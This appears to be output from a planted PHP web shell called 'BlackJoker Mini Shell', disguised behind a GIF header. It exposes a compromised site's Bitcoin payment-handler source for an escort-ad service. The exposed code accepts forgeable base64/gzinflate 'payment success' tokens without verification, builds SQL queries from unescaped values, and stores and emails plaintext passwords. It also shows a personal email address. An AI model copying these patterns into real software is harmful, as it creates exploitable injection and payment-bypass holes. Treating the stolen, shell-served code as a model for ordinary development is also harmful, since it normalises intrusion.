GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/www/
Upload File :
Current File : /home/serb/www/payment_handler_bitcoin.php

<?php 
	session_start();
	include("lib/globals.php");
	include("lib/common.php");
 	include("lib/functions.php");
	 
	$SITE_URL = "http://".$_SERVER['HTTP_HOST']."/";
	
	if(isset($_REQUEST['payment_success_token']) && $_REQUEST['payment_success_token'] != "")
	{
		$_POST = sh_get_array_from_token($_REQUEST['payment_success_token']);	
	
		if(isset($_POST["__PAYMENT_STATUS__"]) && $_POST["__PAYMENT_STATUS__"] == "SUCCESS")
		{ 		
			if(isset($_POST['__RECORD_ID__']) && $_POST['__RECORD_ID__'] != "")
			{	
				$RECORD_ID = sh_decrypt($_POST['__RECORD_ID__']);			
				if($RECORD_ID > 0)
				{	
					$TEMP_USER_ID = sh_decrypt($_POST['__TEMP_USER_ID__']);
					if($TEMP_USER_ID > 0)
					{
						$tres = execute_query("SELECT * FROM temp_user_data WHERE id='".$TEMP_USER_ID."'");
						if(mysql_num_rows($tres) > 0)
						{
							$trow = mysql_fetch_array($tres);
							$SESSION_ARRAY = json_decode($trow['data'],true);
						}
					}			
					/*-------*/
															
						$date=date('Y-m-d');
						$sql_rtvdata="select * from temp_postad where id='".$RECORD_ID."'";
						$res_rtvdata=execute_query($sql_rtvdata);
						$row_rtvdata=mysql_fetch_array($res_rtvdata);	
						$desc=addslashes($row_rtvdata['description']);
						$srcc=addslashes($row_rtvdata['source']);
						$slogan=addslashes($row_rtvdata['slogan']);
						$higt=$row_rtvdata['height'];
						
						//$daay=$row_rtvdata['ft_ad_day'];
						//$adprice1=$featured_ad_day_price_array[$row_rtvdata['ft_ad_day']];
						
						
						$ftno_ofweek=$row_rtvdata['ft_ad_day'];
						$sql_adprice1="SELECT * FROM featured_ad_price WHERE no_of_weeks='$ftno_ofweek'";
						$res_adprice1=execute_query($sql_adprice1);
						$row_adprice1=mysql_fetch_array($res_adprice1);
						$adprice1=$row_adprice1['ad_price'];
						$ftadstatus='Yes';
						$no_ofday=explode(' ',$ftno_ofweek);
						$daay=$no_ofday[0] * 7;
						$expiry = date("Y-m-d", time() + $daay*24*60*60 );
						
						
						
										
						
												
						//$expiry = date("Y-m-d", time() + $daay*24*60*60 );
						
						$ipp=@$_SERVER['REMOTE_ADDR'];
						$ins="INSERT INTO user_info(userid,username,password,email,user_type,user_country,status,ipaddress,dob,dob_month) VALUES('','".$SESSION_ARRAY['reg_username']."','".$SESSION_ARRAY['reg_pass']."','".$SESSION_ARRAY['reg_email']."','".$SESSION_ARRAY['reg_acctype']."','".$SESSION_ARRAY['countryname']."','u','$ipp','".$row_rtvdata['dob']."','".$row_rtvdata['dob_month']."')";
						execute_query($ins);
						$id=mysql_insert_id();	
						$act_id=base64_encode($id);
						$to=$SESSION_ARRAY['reg_email'];
						$subject="Your account has been successfully created for escortservice.org";
						/*$body="Thank you for register with escortservice.org.\r\n Your account has been successfully created.\r\nBelow You will find your account details to login:\r\n\r\nUsername:".$SESSION_ARRAY['reg_username']."\r\nPassword:".$SESSION_ARRAY['reg_pass']."\r\n\r\nTo active your account please click the link below:http://escortservice.org/active.php?id=".$id;
						
						$headers = 'From:escortservice<support@escortservice.org>' . "\r\n" .
						'Reply-To: support@escortservice.org' . "\r\n" .
						'X-Mailer: PHP/' . phpversion();
						
						
						mail($to, $subject, $body, $headers);*/	
						
						mail("shrdharyni@gmail.com","from escortservices bitcoin handler","hello ".$SESSION_ARRAY['reg_username'],"shrdharyni@gmail.com");
						$body="<html>
							<head>
							  <title>Thank you for register with Escortservice.org</title>
							</head>
							<body>
							<table style='padding:10px; color:#000;'>
								<tr><th>Thank you for register with Escortservice.org</th></tr>
								<tr><td><br/></td></tr>
								<tr>
								  <td>Your account has been successfully created.</td>
								</tr>
								<tr>
								  <td>Below You will find your account details to login:</td>
								</tr>
								<tr>
								  <td>Username:".$SESSION_ARRAY['reg_username']."</td>
								</tr>
								<tr>
								  <td>Password:".$SESSION_ARRAY['reg_pass']."</td>
								</tr>
								<tr>
								  <td>To active your account please click the link below:<a href='http://escortservice.org/active.php?id=$id' style='color:#AD0066;'>Click Here</a></td>
								</tr>
							  </table>
							</body>
							</html>";
							// To send HTML mail, the Content-type header must be set
							// $headers  = 'MIME-Version: 1.0' . "\r\n";
							// $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
							
							// Additional headers
							// $headers .= 'From: escortservice <support@escortservice.org>' . "\r\n";
								
							sendEmail($to, $subject, $body);
							// mail($to, $subject, $body, $headers);			
					
						
						$sql_ind_escort="insert into escort_details (id,user_id,escort_type,nickname,slogan,website,
						skype,
						email,
						update_email,
						address,
						escort_state,
						escort_city,country_name,
						gender,
						travel,
						couples,	
						age,
						ethencity,
						orientation,
						duos,
						nationality,
						shaved,
						language,
						height,
						weight,
						tits,
						pussy,
						eye_color,
						hair_color,
						meeting_men,
						meeting_wm,
						meeting_cup,
						meeting_trans,			
						meeting_gays,
						meeting_two,
						tel_national,tel_inter,					
						update_tele,smstext,whatsapps,instruction,
						hidden_phone,
						pornstar,
						pornstar_name,
						bdms,
						partner,
						incall,
						outcall,
						massage,
						description,					
						creation_date,
						status,updatedate,ft_ad_day,ft_ad_price,ft_ad_expair,ft_ad_status,travel_area,dob,dob_month,source,receive_email,desktop,vid_you2,ad_total_amount,is_flash,ad_type) VALUES ('','$id','".$SESSION_ARRAY['reg_acctype']."',
						'".$row_rtvdata['nickname']."','$slogan','".$row_rtvdata['website']."',
						'".$row_rtvdata['skype']."',
						
						'".$row_rtvdata['email']."',
						'".$row_rtvdata['update_email']."','',
						'".$row_rtvdata['escort_state']."',
						'".$row_rtvdata['escort_city']."',
						'".$row_rtvdata['country_name']."',
						'".$row_rtvdata['gender']."',
						'".$row_rtvdata['travel']."','".$row_rtvdata['couples']."',
						'".$row_rtvdata['age']."',
						'".$row_rtvdata['ethencity']."',
						'".$row_rtvdata['orientation']."',
						
						'".$row_rtvdata['duos']."',
						'".$row_rtvdata['nationality']."',
						'".$row_rtvdata['shaved']."',
						'".$row_rtvdata['language']."',
						'$higt',
						'".$row_rtvdata['weight']."',
						'".$row_rtvdata['tits']."',
						'".$row_rtvdata['pussy']."',
						'".$row_rtvdata['eye_color']."',
						'".$row_rtvdata['hair_color']."',
						
						'".$row_rtvdata['meeting_men']."',
						'".$row_rtvdata['meeting_wm']."',
						'".$row_rtvdata['meeting_cup']."',
						'".$row_rtvdata['meeting_trans']."',
						'".$row_rtvdata['meeting_gays']."',
						'".$row_rtvdata['meeting_two']."',
						'".$row_rtvdata['tel_national']."',
						'".$row_rtvdata['tel_inter']."',
						'".$row_rtvdata['update_tele']."',
						'".$row_rtvdata['smstext']."',
						'".$row_rtvdata['whatsapps']."',
						
						'".$row_rtvdata['instruction']."',
						'".$row_rtvdata['hidden_phone']."',
						
						'".$row_rtvdata['pornstar']."',					
						'".$row_rtvdata['pornstar_name']."',
						'".$row_rtvdata['bdms']."',
						'".$row_rtvdata['partner']."',
						'".$row_rtvdata['incall']."',
						'".$row_rtvdata['outcall']."',
						'".$row_rtvdata['massage']."',
						'$desc',					
						now(),
						'a','','".$row_rtvdata['ft_ad_day']."','$adprice1','$expiry','Yes','".$row_rtvdata['travel_area']."','".$row_rtvdata['dob']."','".$row_rtvdata['dob_month']."','$srcc','".$row_rtvdata['receive_email']."','D','".$row_rtvdata['vid_you2']."','".$row_rtvdata['ad_total_amount']."','".$row_rtvdata['is_flash']."','".$row_rtvdata['ad_type']."')";
						
						
						$ind_res=execute_query($sql_ind_escort);
														
						$pid=mysql_insert_id();
						$sql_q="INSERT INTO escort_photo(id,postid,userid,picture)VALUES('','$pid','$id','".$row_rtvdata['image1']."')";
						execute_query($sql_q);
						
						$sql_q2="INSERT INTO escort_photo(id,postid,userid,picture)VALUES('','$pid','$id','".$row_rtvdata['image2']."')";
						execute_query($sql_q2);
						
						$sql_q3="INSERT INTO escort_photo(id,postid,userid,picture)VALUES('','$pid','$id','".$row_rtvdata['image3']."')";
						execute_query($sql_q3);
						
						$sql_q4="INSERT INTO escort_photo(id,postid,userid,picture)VALUES('','$pid','$id','".$row_rtvdata['image4']."')";
						execute_query($sql_q4);
						
						
						if (strlen($desc) > 40) // if len is more than 10
							{ // shorten it and add trailing dots.
							$description=substr($desc, 0, 40) . "...";
							}
							else // len is less than 10, use original description.
							{
							   $description = $desc;
							} 
			 
						 $sql_tweet="INSERT INTO tweet(id,postid,userid,tweetcontain,city,gender)Values('','$pid','$id','$description','".$row_rtvdata['escort_city']."','".$row_rtvdata['gender']."')";
						 execute_query($sql_tweet);	
						
						
						
							$SESSION_ARRAY['reg_username']="";
							$SESSION_ARRAY['reg_email']="";				
							$SESSION_ARRAY['reg_pass']="";
							$SESSION_ARRAY['reg_acctype']="";
							$SESSION_ARRAY['DOB']="";
							$SESSION_ARRAY['dob_month']="";
				
				

					//$sql_email="SELECT * FROM user_info WHERE userid='".$row_rtvdata['user_id']."'";
					//$res_email=execute_query($sql_email);
					//$row_email=mysql_fetch_array($res_email);		

				$totalammount=$adprice1;	
				
				$inser_pyment="INSERT into payment_dtls(id,post_id,fname,email,exp_date,amount,status)Values('','$pid','".$row_rtvdata['nickname']."','".$row_rtvdata['email']."','$expiry','$totalammount','a')";
	
				execute_query($inser_pyment);
				
				if($row_rtvdata['is_flash'] == 1 || $row_rtvdata['is_flash'] == 2)
				{
					$is_featured = 0;
					if($row_rtvdata['is_flash'] == 2)
					{
						$is_featured = 1;
						$flash_total_days = $fflash_total_days;
					}
					
					$daay = $flash_total_days;
					$expiry1 = date("Y-m-d", time() + $daay*24*60*60 );
					$cur_time = time();
					$secret_key = md5($escort_detail_row['id']);
					$other_city = '';
					
					$insert_flash_query2 = "insert into flash_post_ads(location,email,body,file_name,display_days,posted_time,secret_key,other_city,site_ad_no,user_id,ad_status,expiry_date,is_featured) values('".$row_rtvdata['escort_city']."', '".$row_rtvdata['email']."', '".$desc."', '".$row_rtvdata['image1']."',  $flash_total_days, '$cur_time','$secret_key','$other_city','".$pid."','".$id."','1','".$expiry1."','".$is_featured."')";						
					execute_query($insert_flash_query2) or die(mysql_error());
				}
								
				$sql_delete="DELETE from  temp_postad where id='".$RECORD_ID."'";
				execute_query($sql_delete);
					
					/*-------*/
					
					/*unset($SESSION_ARRAY['SH_ESCORT_ID']);
					
					header("Location: ".$_POST['__REDIRECT_URL__']);
					exit;*/
				}
			}
		}
	}
	
	function sh_decrypt($id)
	{
		$id = base64_decode($id);
		$id = base64_decode($id);
		$id = gzinflate($id);
		$id = base64_decode($id);
		return $id;
	}
	
	function sh_get_array_from_token($token)
	{
		$decoded_data	= base64_decode(base64_decode($token));
		$decrypted_data = gzinflate($decoded_data);
		$decoded_data 	= base64_decode($decrypted_data);
		return json_decode($decoded_data,1);
	}

./BlackJoker Mini Shell 1.0